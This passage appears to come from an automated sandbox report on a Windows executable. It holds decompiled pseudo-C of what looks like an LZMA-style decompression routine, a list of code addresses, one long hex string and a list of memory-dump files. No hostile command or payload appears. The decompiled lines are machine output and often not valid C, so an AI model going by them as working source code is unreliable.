							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x0040691b
0x00406922
0x00406928
0x0040692e
0x00000000
0x00406932
0x0040693e
0x0040693e
0x0040693e
0x00406947
0x00000000
0x00000000
0x0040694d
0x00000000
0x00406954
0x00406958
0x00000000
0x00000000
0x00406961
0x00406964
0x00406967
0x00406969
0x0040696b
0x00000000
0x00000000
0x00406971
0x00406974
0x00406976
0x00406977
0x0040697a
0x0040697c
0x0040697d
0x0040697f
0x00406982
0x00406987
0x0040698c
0x00406995
0x004069a8
0x004069ab
0x004069b4
0x004069b7
0x004069df
0x004069df
0x004069e1
0x004069ef
0x004069ef
0x004069f3
0x00000000
0x00000000
0x00000000
0x00000000
0x004069e3
0x004069e3
0x004069e6
0x004069e6
0x004069e7
0x004069e7
0x00000000
0x004069e3
0x004069b9
0x004069bd
0x004069c2
0x004069c2
0x004069cb
0x004069d1
0x004069d3
0x004069d6
0x00000000
0x004069dc
0x004069dc
0x00000000
0x004069dc
0x00000000
0x004069f9
0x004069f9
0x004069fd
0x004072a9
0x00000000
0x004072a9
0x00406a06
0x00406a16
0x00406a19
0x00406a1c
0x00406a1c
0x00406a1c
0x00406a1f
0x00406a1f
0x00406a23
0x00000000
0x00000000
0x00406a25
0x00406a28
0x00406a2b
0x00406a55
0x00406a5b
0x00406a62
0x00000000
0x00406a62
0x00406a2d
0x00406a31
0x00406a34
0x00406a39
0x00406a39
0x00406a44
0x00406a4a
0x00406a4c
0x00406a4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a94
0x00406a9a
0x00406a9d
0x00406aaa
0x00406ab2
0x00000000
0x00000000
0x00406a69
0x00406a69
0x00406a6d
0x004072b8
0x00000000
0x004072b8
0x00406a79
0x00406a84
0x00406a84
0x00406a84
0x00406a87
0x00406a8a
0x00406a8d
0x00406a90
0x00406a92
0x00000000
0x00000000
0x00000000
0x00000000
0x00407129
0x00407129
0x0040712f
0x00407135
0x00407138
0x0040713b
0x00407155
0x00407158
0x0040715e
0x00407169
0x00407169
0x0040716b
0x0040713d
0x0040713d
0x0040714c
0x00407150
0x00407150
0x0040716e
0x00407175
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407177
0x00407177
0x0040717b
0x0040732a
0x00000000
0x0040732a
0x00407187
0x0040718e
0x00407196
0x00407196
0x00407196
0x00407199
0x0040719c
0x0040719c
0x00000000
0x00000000
0x00406aba
0x00406abc
0x00406abf
0x00406b30
0x00406b33
0x00406b36
0x00406b3d
0x00406b47
0x00000000
0x00406b47
0x00406ac1
0x00406ac5
0x00406ac8
0x00406aca
0x00406acd
0x00406ad0
0x00406ad2
0x00406ad5
0x00406ad7
0x00406adc
0x00406adf
0x00406ae2
0x00406ae6
0x00406aed
0x00406af0
0x00406af7
0x00406afb
0x00406b03
0x00406b03
0x00406b03
0x00406afd
0x00406afd
0x00406afd
0x00406af2
0x00406af2
0x00406af2
0x00406b07
0x00406b0a
0x00406b28
0x00406b2a
0x00000000
0x00406b2a
0x00406b0c
0x00406b0f
0x00406b12
0x00406b15
0x00406b17
0x00406b17
0x00406b17
0x00406b1a
0x00406b1d
0x00406b1f
0x00406b20
0x00406b23
0x00000000
0x00000000
0x00406d59
0x00406d5d
0x00406d7b
0x00406d7e
0x00406d85
0x00406d88
0x00406d8b
0x00406d8e
0x00406d91
0x00406d94
0x00406d96
0x00406d9d
0x00406d9e
0x00406da0
0x00406da3
0x00406da6
0x00406da9
0x00406da9
0x00406dae
0x00000000
0x00406dae
0x00406d5f
0x00406d62
0x00406d65
0x00406d6f
0x00000000
0x00000000
0x00406dc3
0x00406dc7
0x00406dea
0x00406ded
0x00406df0
0x00406dfa
0x00406dc9
0x00406dc9
0x00406dcc
0x00406dcf
0x00406dd2
0x00406ddf
0x00406de2
0x00406de2
0x00000000
0x00000000
0x00406e06
0x00406e0a
0x00000000
0x00000000
0x00406e10
0x00406e14
0x00000000
0x00000000
0x00406e1a
0x00406e1c
0x00406e20
0x00406e20
0x00406e23
0x00406e27
0x00000000
0x00000000
0x00406e77
0x00406e7b
0x00406e82
0x00406e85
0x00406e88
0x00406e92
0x00000000
0x00406e92
0x00406e7d
0x00000000
0x00000000
0x00406e9e
0x00406ea2
0x00406ea9
0x00406eac
0x00406eaf
0x00406ea4
0x00406ea4
0x00406ea4
0x00406eb2
0x00406eb5
0x00406eb8
0x00406eb8
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec1
0x00406ec4
0x00406ecb
0x00406ed0
0x00000000
0x00000000
0x00406f5e
0x00406f5e
0x00406f62
0x00407300
0x00000000
0x00407300
0x00406f68
0x00406f6b
0x00406f6e
0x00406f72
0x00406f75
0x00406f7b
0x00406f7d
0x00406f7d
0x00406f7d
0x00406f80
0x00406f83
0x00000000
0x00000000
0x00406b53
0x00406b53
0x00406b57
0x004072c4
0x00000000
0x004072c4
0x00406b5d
0x00406b60
0x00406b63
0x00406b67
0x00406b6a
0x00406b70
0x00406b72
0x00406b72
0x00406b72
0x00406b75
0x00406b78
0x00406b78
0x00406b7b
0x00406b7e
0x00000000
0x00000000
0x00406b84
0x00406b8a
0x00000000
0x00000000
0x00406b90
0x00406b90
0x00406b94
0x00406b97
0x00406b9a
0x00406b9d
0x00406ba0
0x00406ba1
0x00406ba4
0x00406ba6
0x00406bac
0x00406baf
0x00406bb2
0x00406bb5
0x00406bb8
0x00406bbb
0x00406bbe
0x00406bda
0x00406bdd
0x00406be0
0x00406be3
0x00406bea
0x00406bee
0x00406bf0
0x00406bf4
0x00406bc0
0x00406bc0
0x00406bc4
0x00406bcc
0x00406bd1
0x00406bd3
0x00406bd5
0x00406bd5
0x00406bf7
0x00406bfe
0x00406c01
0x00000000
0x00406c07
0x00000000
0x00406c07
0x00000000
0x00406c0c
0x00406c0c
0x00406c10
0x004072d0
0x00000000
0x004072d0
0x00406c16
0x00406c19
0x00406c1c
0x00406c20
0x00406c23
0x00406c29
0x00406c2b
0x00406c2b
0x00406c2b
0x00406c2e
0x00406c31
0x00406c31
0x00406c31
0x00406c37
0x00000000
0x00000000
0x00406c39
0x00406c3c
0x00406c3f
0x00406c42
0x00406c45
0x00406c48
0x00406c4b
0x00406c4e
0x00406c51
0x00406c54
0x00406c57
0x00406c6f
0x00406c72
0x00406c75
0x00406c78
0x00406c78
0x00406c7b
0x00406c7f
0x00406c81
0x00406c59
0x00406c59
0x00406c61
0x00406c66
0x00406c68
0x00406c6a
0x00406c6a
0x00406c84
0x00406c8b
0x00406c8e
0x00000000
0x00406c90
0x00000000
0x00406c90
0x00406c8e
0x00406c95
0x00406c95
0x00406c95
0x00406c95
0x00000000
0x00000000
0x00406cd0
0x00406cd0
0x00406cd4
0x004072dc
0x00000000
0x004072dc
0x00406cda
0x00406cdd
0x00406ce0
0x00406ce4
0x00406ce7
0x00406ced
0x00406cef
0x00406cef
0x00406cef
0x00406cf2
0x00406cf5
0x00406cf5
0x00406cfb
0x00406c99
0x00406c99
0x00406c9c
0x00000000
0x00406c9c
0x00406cfd
0x00406cfd
0x00406d00
0x00406d03
0x00406d06
0x00406d09
0x00406d0c
0x00406d0f
0x00406d12
0x00406d15
0x00406d18
0x00406d1b
0x00406d33
0x00406d36
0x00406d39
0x00406d3c
0x00406d3c
0x00406d3f
0x00406d43
0x00406d45
0x00406d1d
0x00406d1d
0x00406d25
0x00406d2a
0x00406d2c
0x00406d2e
0x00406d2e
0x00406d48
0x00406d4f
0x00406d52
0x00000000
0x00406d54
0x00000000
0x00406d54
0x00000000
0x00406fe1
0x00406fe1
0x00406fe5
0x0040730c
0x00000000
0x0040730c
0x00406feb
0x00406fee
0x00406ff1
0x00406ff5
0x00406ff8
0x00406ffe
0x00407000
0x00407000
0x00407000
0x00407003
0x00000000
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00000000
0x00000000
0x004070f0
0x004070f4
0x00407116
0x00407119
0x00407123
0x00407126
0x00407126
0x00000000
0x00407126
0x004070f6
0x004070f9
0x004070fd
0x00407100
0x00407100
0x00407103
0x00000000
0x00000000
0x004071ad
0x004071b1
0x004071cf
0x004071cf
0x004071cf
0x004071d6
0x004071dd
0x004071e4
0x004071e4
0x00000000
0x004071e4
0x004071b3
0x004071b6
0x004071b9
0x004071bc
0x004071c3
0x00407107
0x00407107
0x0040710a
0x00000000
0x00000000
0x0040729e
0x004072a1
0x00000000
0x00000000
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00000000
0x00000000
0x00406eef
0x00406ef2
0x00406ef5
0x00406ef7
0x00406ef9
0x00406ef9
0x00406efa
0x00406efd
0x00406f04
0x00406f07
0x00406f15
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071ee
0x004071f5
0x00000000
0x00000000
0x004071fa
0x004071fa
0x004071fe
0x00407336
0x00000000
0x00407336
0x00407204
0x00407207
0x0040720a
0x0040720e
0x00407211
0x00407217
0x00407219
0x00407219
0x00407219
0x0040721c
0x0040721f
0x0040721f
0x0040721f
0x0040721f
0x00407222
0x00407222
0x00407226
0x00407286
0x00407289
0x0040728e
0x0040728f
0x00407291
0x00407293
0x00407296
0x004071a2
0x004071a2
0x00000000
0x004071a2
0x00407228
0x0040722e
0x00407231
0x00407234
0x00407237
0x0040723a
0x0040723d
0x00407240
0x00407243
0x00407246
0x00407249
0x00407262
0x00407265
0x00407268
0x0040726b
0x0040726f
0x00407271
0x00407271
0x00407272
0x00407275
0x0040724b
0x0040724b
0x00407253
0x00407258
0x0040725a
0x0040725d
0x0040725d
0x00407278
0x0040727f
0x00000000
0x00407281
0x00000000
0x00407281
0x00000000
0x00406f1d
0x00406f20
0x00406f56
0x00407086
0x00407086
0x00407086
0x00407086
0x00407089
0x00407089
0x0040708c
0x0040708e
0x00407318
0x00000000
0x00407318
0x00407094
0x00407097
0x00000000
0x00000000
0x0040709d
0x004070a1
0x004070a4
0x004070a4
0x004070a4
0x00000000
0x004070a4
0x00406f22
0x00406f24
0x00406f26
0x00406f28
0x00406f2b
0x00406f2c
0x00406f2e
0x00406f30
0x00406f33
0x00406f36
0x00406f4c
0x00406f51
0x00406f89
0x00406f89
0x00406f8d
0x00406fb9
0x00406fbb
0x00406fc2
0x00406fc5
0x00406fc8
0x00406fc8
0x00406fcd
0x00406fcd
0x00406fcf
0x00406fd2
0x00406fd9
0x00406fdc
0x00407009
0x00407009
0x0040700c
0x0040700f
0x00407083
0x00407083
0x00407083
0x00000000
0x00407083
0x00407011
0x00407017
0x0040701a
0x0040701d
0x00407020
0x00407023
0x00407026
0x00407029
0x0040702c
0x0040702f
0x00407032
0x0040704b
0x0040704d
0x00407050
0x00407051
0x00407054
0x00407056
0x00407059
0x0040705b
0x0040705d
0x00407060
0x00407062
0x00407065
0x00407069
0x0040706b
0x0040706b
0x0040706c
0x0040706f
0x00407072
0x00407034
0x00407034
0x0040703c
0x00407041
0x00407043
0x00407046
0x00407046
0x00407075
0x0040707c
0x00407006
0x00407006
0x00407006
0x00407006
0x00000000
0x0040707e
0x00000000
0x0040707e
0x0040707c
0x00406f8f
0x00406f92
0x00406f94
0x00406f97
0x00406f9a
0x00406f9d
0x00406f9f
0x00406fa2
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fa8
0x00406fab
0x00406fb2
0x00406f86
0x00406f86
0x00406f86
0x00406f86
0x00000000
0x00406fb4
0x00000000
0x00406fb4
0x00406fb2
0x00406f38
0x00406f3b
0x00406f3d
0x00406f40
0x00000000
0x00000000
0x00406c9f
0x00406c9f
0x00406ca3
0x004072e8
0x00000000
0x004072e8
0x00406ca9
0x00406cac
0x00406caf
0x00406cb2
0x00406cb5
0x00406cb8
0x00406cbb
0x00406cbd
0x00406cc0
0x00406cc3
0x00406cc6
0x00406cc8
0x00406cc8
0x00406cc8
0x00000000
0x00000000
0x00406e2a
0x00406e2a
0x00406e2e
0x004072f4
0x00000000
0x004072f4
0x00406e34
0x00406e37
0x00406e3a
0x00406e3d
0x00406e3f
0x00406e3f
0x00406e3f
0x00406e42
0x00406e45
0x00406e48
0x00406e4b
0x00406e4e
0x00406e51
0x00406e52
0x00406e54
0x00406e54
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e60
0x00406e60
0x00406e63
0x00406e65
0x00406e65
0x00000000
0x00000000
0x004070a7
0x004070a7
0x004070a7
0x004070ab
0x00000000
0x00000000
0x004070b1
0x004070b4
0x004070b7
0x004070ba
0x004070bc
0x004070bc
0x004070bc
0x004070bf
0x004070c2
0x004070c5
0x004070c8
0x004070cb
0x004070ce
0x004070cf
0x004070d1
0x004070d1
0x004070d1
0x004070d4
0x004070d7
0x004070da
0x004070dd
0x004070e0
0x004070e4
0x004070e6
0x004070e9
0x00000000
0x004070eb
0x00406e68
0x00406e68
0x00000000
0x00406e68
0x004070e9
0x0040731e
0x00407340
0x00407346
0x00407348
0x0040734f
0x00000000
0x00000000
0x0040694d
0x00407355
0x00407355
0x00000000

Strings

FCEAF61A311585AC6CA556831186CD793724A0B7900E741FEFF1200B1061D2A9B415E783220261FF3D536B1B0D612FC63F91BA8D4234ABBAB3D7F7893FE45659AE7B55866CD10E685CD8C02E2F47BBF3462FF67720F6F9244921F8462D05B15FACCEB33EB2C6AF53DA46A58968758B5A7F01499FB422FFD6C38FD57CC3FC9B971AE6, xrefs: 0040690B

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
